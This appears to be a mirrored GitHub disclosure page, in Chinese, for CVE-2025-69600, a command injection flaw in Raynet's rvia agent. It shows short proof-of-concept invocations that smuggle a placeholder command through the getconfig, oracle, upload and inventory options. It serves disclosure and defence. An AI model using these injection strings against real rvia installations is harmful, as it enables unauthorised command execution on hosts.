Wise-Security/CVE-2025-69600

GitHub: Wise-Security/CVE-2025-69600

记录 Raynet rvia 软件命令注入漏洞(CVE-2025-69600)的漏洞披露仓库,详细展示了通过多个功能选项实现命令执行的攻击路径。

Stars: 0 | Forks: 0

# CVE-2025-69600 - **作者:** Rafael José Núñez Gulías - **公司:** Iberian Var Group Raynet 的 `rvia` 版本 12.6.4392.49-amd64.deb 中的命令注入漏洞(以前的版本可能受到影响,但未确认)允许攻击者通过 `getconfig`、`upload`、`inventory` 和 `oracle` 选项执行命令。 仅当从 `/opt/rvia/rvia.cfg` 配置文件获取 URL 时(且如果在 `/etc/rvia_configuration` 中通过配置属性 `ForbiddenCurlChars` 进行了配置),才会执行验证;而当 URL 直接传递给 `getconfig` 或 `upload` 选项时,则不会进行验证。 ``` /opt/rvia/rvia getconfig \;command\; ``` ![20260211165649.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/6cf465e815111659.png) 在底层,构造的命令如下所示: ![20260212154626.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/17c0e0f886111700.png) 通过 `oracle` 选项也可以注入命令。 在这种情况下,`/opt/rvia/rvia.cfg` 定义了选项 `javaPaths=/usr/lib/jvm/java-21-openjdk-amd64/`。 ``` /opt/rvia/rvia oracle \;command\; ``` ![20260211165950.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/bad37aa351111701.png) 构造的命令如下所示: ![20260212152924.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/42e4f921f3111701.png) 配置文件(`/opt/rvia/rvia.cfg`)中的 `oracleUser` 和 `oraclePass` 选项也存在同样的问题。 ![20251209115509.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/4194871f50111702.png) 底层的调用如下所示: ![20260212153827.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/8ff85ac997111703.png) `upload` 选项也同样适用,通过在 URL 规范之后指定要执行的命令即可。在这种情况下,需要先转义双引号,并在命令末尾添加井号以忽略后续参数。 ``` /opt/rvia/rvia upload \"\;command\;# ``` ![20260211170615.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/129058dc49111704.png) 从 `ltrace` 中我们可以看到以下内容: ![20260212154419.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/624d242661111705.png) 最后,`inventory` 选项也存在漏洞。 ``` /opt/rvia/rvia inventory \;command\; ``` ![20260211170530.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/8593a24939111706.png) 底层构造的命令: ![20260212154533.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/c9d7c2b744111707.png)
标签:0day, AMD64, CISA项目, Cutter, CVE-2025-69600, Exploit, JS文件枚举, PoC, Raynet, RCE, rvia, TLS抓取, Zero-Day, 事件响应, 参数注入, 命令注入, 威胁模拟, 暴力破解, 漏洞, 编程工具, 软件安全, 输入验证缺失, 远程代码执行